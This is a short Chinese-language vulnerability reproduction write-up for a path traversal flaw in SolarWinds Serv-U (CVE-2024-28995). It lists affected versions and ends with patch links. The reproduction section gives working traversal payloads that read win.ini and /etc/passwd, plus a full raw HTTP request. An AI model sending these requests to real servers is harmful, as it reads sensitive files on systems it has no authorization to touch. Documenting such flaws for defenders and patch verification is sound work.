0x00写在前面

本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!

0x01漏洞介绍

SolarWinds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器

SolarWinds Serv-U存在路径遍历漏洞,该漏洞源于容易受到目录横向的影响,允许访问读取主机上的敏感文件。

0x02影响版本

1、 SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1 

2、 SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1 

3、 SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1 

4、 (注意:Serv-U 版本15.3.2及更早版本将于 2025 年 2 月终止使用,并且此版本以下的所有版本都已终止使用并且不再受支持。)

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC 

漏洞复现

win

/?InternalDir=/../../../../Windows/&InternalFile=win.ini

Linux

/?InternalDir=\..\..\..\..\etc&InternalFile=passwd

漏洞复现

GET /?InternalDir=/../../../../Windows/&InternalFile=win.ini HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencoded

读文件win.ini成功。


3.Yakit工具加载nuclei文件测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995
https://ti.qianxin.com/vulnerability/detail/355260